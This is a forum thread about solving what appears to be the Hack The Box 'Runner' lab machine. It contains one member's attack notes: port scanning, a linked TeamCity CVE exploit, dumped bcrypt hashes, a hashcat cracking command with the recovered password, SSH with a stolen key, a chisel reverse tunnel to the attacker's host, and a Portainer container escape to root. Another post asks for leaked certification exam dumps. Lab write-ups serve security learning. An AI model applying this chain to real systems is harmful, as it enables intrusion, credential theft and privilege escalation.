Posts: 1
Threads: 0
Joined: Apr 2024
(Apr 20, 2024, 08:10 PM)medo5120 Wrote: (Apr 20, 2024, 07:22 PM)itsBlackNight Wrote: nmap -sS -p- $ip
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
dirsearch showed /assets on port 80 with 403 response
&& http://runner.htb:8000/version ->0.0.0-src
teamcity.runner.htb
maybe this is interesting /api/swagger-ui.html
ow the heck did you get this teamcity, wasn't in any of my lists xDD
could you? It doesn't appear anywhere, it doesn't let me access it from the browser.
Posts: 60
Threads: 3
Joined: Feb 2024
GUYS IS THERE ANY WRITEUP AVAILABLE FOR THIS
Posts: 14
Threads: 0
Joined: Apr 2024
(Apr 24, 2024, 06:11 AM)camser Wrote: (Apr 20, 2024, 08:10 PM)medo5120 Wrote: (Apr 20, 2024, 07:22 PM)itsBlackNight Wrote: nmap -sS -p- $ip
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
dirsearch showed /assets on port 80 with 403 response
&& http://runner.htb:8000/version ->0.0.0-src
teamcity.runner.htb
maybe this is interesting /api/swagger-ui.html
ow the heck did you get this teamcity, wasn't in any of my lists xDD
could you? It doesn't appear anywhere, it doesn't let me access it from the browser.
Yeah, it was in bitquark-subdomains-top100000
Posts: 43
Threads: 1
Joined: Sep 2023
Apr 25, 2024, 05:56 PM
(This post was last modified: Apr 25, 2024, 05:56 PM by hunter0003.)
(Apr 25, 2024, 03:40 PM)medo5120 Wrote: (Apr 24, 2024, 06:11 AM)camser Wrote: (Apr 20, 2024, 08:10 PM)medo5120 Wrote: (Apr 20, 2024, 07:22 PM)itsBlackNight Wrote: nmap -sS -p- $ip
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
dirsearch showed /assets on port 80 with 403 response
&& http://runner.htb:8000/version ->0.0.0-src
teamcity.runner.htb
maybe this is interesting /api/swagger-ui.html
ow the heck did you get this teamcity, wasn't in any of my lists xDD
could you? It doesn't appear anywhere, it doesn't let me access it from the browser.
Yeah, it was in bitquark-subdomains-top100000
here is solution for you https://cybershakha.com/writeups/officia...al-machine
write-up for you
https://cybershakha.com/writeups/officia...al-machine
Posts: 245
Threads: 29
Joined: Nov 2023
(Apr 25, 2024, 05:56 PM)hunter0003 Wrote: (Apr 25, 2024, 03:40 PM)medo5120 Wrote: (Apr 24, 2024, 06:11 AM)camser Wrote: (Apr 20, 2024, 08:10 PM)medo5120 Wrote: (Apr 20, 2024, 07:22 PM)itsBlackNight Wrote: nmap -sS -p- $ip
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
dirsearch showed /assets on port 80 with 403 response
&& http://runner.htb:8000/version ->0.0.0-src
teamcity.runner.htb
maybe this is interesting /api/swagger-ui.html
ow the heck did you get this teamcity, wasn't in any of my lists xDD
could you? It doesn't appear anywhere, it doesn't let me access it from the browser.
Yeah, it was in bitquark-subdomains-top100000
here is solution for you https://cybershakha.com/writeups/officia...al-machine
write-up for you
https://cybershakha.com/writeups/officia...al-machine
Incomplete writeup, root part is not available
Thanks @paw for the rank!!
Posts: 43
Threads: 1
Joined: Sep 2023
Apr 25, 2024, 06:02 PM
(This post was last modified: Apr 25, 2024, 06:03 PM by hunter0003.)
(Apr 25, 2024, 06:00 PM)macavitysworld Wrote: (Apr 25, 2024, 05:56 PM)hunter0003 Wrote: (Apr 25, 2024, 03:40 PM)medo5120 Wrote: (Apr 24, 2024, 06:11 AM)camser Wrote: (Apr 20, 2024, 08:10 PM)medo5120 Wrote: ow the heck did you get this teamcity, wasn't in any of my lists xDD
could you? It doesn't appear anywhere, it doesn't let me access it from the browser.
Yeah, it was in bitquark-subdomains-top100000
root is easy try by yourself 
here is solution for you https://cybershakha.com/writeups/officia...al-machine
write-up for you
https://cybershakha.com/writeups/officia...al-machine
Incomplete writeup, root part is not available
(Apr 25, 2024, 06:02 PM)hunter0003 Wrote: (Apr 25, 2024, 06:00 PM)macavitysworld Wrote: (Apr 25, 2024, 05:56 PM)hunter0003 Wrote: (Apr 25, 2024, 03:40 PM)medo5120 Wrote: (Apr 24, 2024, 06:11 AM)camser Wrote: could you? It doesn't appear anywhere, it doesn't let me access it from the browser.
Yeah, it was in bitquark-subdomains-top100000
root is easy try by yourself
here is solution for you https://cybershakha.com/writeups/officia...al-machine
write-up for you
https://cybershakha.com/writeups/officia...al-machine
Incomplete writeup, root part is not available root is easy try by yourself if you want root message me i will give you
Posts: 245
Threads: 29
Joined: Nov 2023
(Apr 25, 2024, 06:02 PM)hunter0003 Wrote: (Apr 25, 2024, 06:00 PM)macavitysworld Wrote: (Apr 25, 2024, 05:56 PM)hunter0003 Wrote: (Apr 25, 2024, 03:40 PM)medo5120 Wrote: (Apr 24, 2024, 06:11 AM)camser Wrote: could you? It doesn't appear anywhere, it doesn't let me access it from the browser.
Yeah, it was in bitquark-subdomains-top100000
root is easy try by yourself
here is solution for you https://cybershakha.com/writeups/officia...al-machine
write-up for you
https://cybershakha.com/writeups/officia...al-machine
Incomplete writeup, root part is not available
(Apr 25, 2024, 06:02 PM)hunter0003 Wrote: (Apr 25, 2024, 06:00 PM)macavitysworld Wrote: (Apr 25, 2024, 05:56 PM)hunter0003 Wrote: (Apr 25, 2024, 03:40 PM)medo5120 Wrote: Yeah, it was in bitquark-subdomains-top100000
root is easy try by yourself
here is solution for you https://cybershakha.com/writeups/officia...al-machine
write-up for you
https://cybershakha.com/writeups/officia...al-machine
Incomplete writeup, root part is not available root is easy try by yourself if you want root message me i will give you
Already root! Thanks
Thanks @paw for the rank!!
Posts: 35
Threads: 0
Joined: Dec 2023
Does anyone have EJPT V1/V2 exam dump or walkthrough???
Either version- Please help out if you have
Posts: 39
Threads: 6
Joined: Jan 2024
Apr 26, 2024, 04:49 PM
(This post was last modified: Apr 26, 2024, 04:49 PM by itsBlackNight.)
(Apr 24, 2024, 05:34 AM)0xff_anonymous Wrote: is there any writeup available
Technically the whole post is writable but imma sure with yall my notes
## Runner Linux Machine
## target ip
10.10.11.13
## Recon
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
8000/tcp open nagios-nsca Nagios NSCA
## Enumeration
[1] - dirsearch :
[+] + showed /assets on port 80 with 403 response
[+] + http://runner.htb:8000/version ->0.0.0-src
[2] - subdomain enumeration :
[+] http://teamcity.runner.htb/login.html
[+] https://github.com/H454NSec/CVE-2023-42793
[3] - Pannel enumeration
[+] + backup file download contains hashes :
$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1713645873123, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, city_adminwhuv, $2a$07$eUwRkt5HJl1DZKr9py62sePYSi7sVG9sMVjZh1h4U6oIJ6IMCf0xa, , angry-admin@funnybunny.org, 1713645885602, BCRYPT
12, h454nsec3577, $2a$07$tnObCkeqLb0uzSQPBqAubeXjiz.Z9bdsCufqs16O2fYzP9GVScGPO, , "", 1713646005818, BCRYPT
13, h454nsec5334, $2a$07$Yr09SJ5UTG6rE6WwepYCJOE8Xpa2A4pB0u.kGqZ4ZHYIljzXh.STW, , "", 1713646174855, BCRYPT
[+] + Only mathew crackable :
hashcat64 -a 0 -m 3200 hashes.txt rockyou.txt -w 3 -O
matthew:piper123 ## useless ## 4 hours afters , its not useless lel
[+] + Find ssh key
```bash
ssh john@$ip -i id_rsa
```
## Foothold
[+] + Basic enumeration methodology again linpeas etc..
[+] + port 9000 interesting
chisel on client :
./chisel client http://10.10.14.14:1234 R:9000:127.0.0.1:9000
chisel on attacker
./chisel server --reverse --port 1234
[+] + login with mathew password
[+] + no need for chisel found this -> http://portainer-administration.runner.htb/#!/home
[+] + make volume , create container , mount /mnt/root
Nice machine !!!
Posts: 60
Threads: 3
Joined: Feb 2024
Apr 27, 2024, 04:17 AM
(This post was last modified: Apr 27, 2024, 04:21 AM by 0xff_anonymous.)
(Apr 26, 2024, 04:49 PM)itsBlackNight Wrote: (Apr 24, 2024, 05:34 AM)0xff_anonymous Wrote: is there any writeup available
Technically the whole post is writable but imma sure with yall my notes
## Runner Linux Machine
## target ip
10.10.11.13
## Recon
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
8000/tcp open nagios-nsca Nagios NSCA
## Enumeration
[1] - dirsearch :
[+] + showed /assets on port 80 with 403 response
[+] + http://runner.htb:8000/version ->0.0.0-src
[2] - subdomain enumeration :
[+] http://teamcity.runner.htb/login.html
[+] https://github.com/H454NSec/CVE-2023-42793
[3] - Pannel enumeration
[+] + backup file download contains hashes :
$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1713645873123, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, city_adminwhuv, $2a$07$eUwRkt5HJl1DZKr9py62sePYSi7sVG9sMVjZh1h4U6oIJ6IMCf0xa, , angry-admin@funnybunny.org, 1713645885602, BCRYPT
12, h454nsec3577, $2a$07$tnObCkeqLb0uzSQPBqAubeXjiz.Z9bdsCufqs16O2fYzP9GVScGPO, , "", 1713646005818, BCRYPT
13, h454nsec5334, $2a$07$Yr09SJ5UTG6rE6WwepYCJOE8Xpa2A4pB0u.kGqZ4ZHYIljzXh.STW, , "", 1713646174855, BCRYPT
[+] + Only mathew crackable :
hashcat64 -a 0 -m 3200 hashes.txt rockyou.txt -w 3 -O
matthew:piper123 ## useless ## 4 hours afters , its not useless lel
[+] + Find ssh key
```bash
ssh john@$ip -i id_rsa
```
## Foothold
[+] + Basic enumeration methodology again linpeas etc..
[+] + port 9000 interesting
chisel on client :
./chisel client http://10.10.14.14:1234 R:9000:127.0.0.1:9000
chisel on attacker
./chisel server --reverse --port 1234
[+] + login with mathew password
[+] + no need for chisel found this -> http://portainer-administration.runner.htb/#!/home
[+] + make volume , create container , mount /mnt/root
Nice machine !!!
Thank you very much, appreciated
|
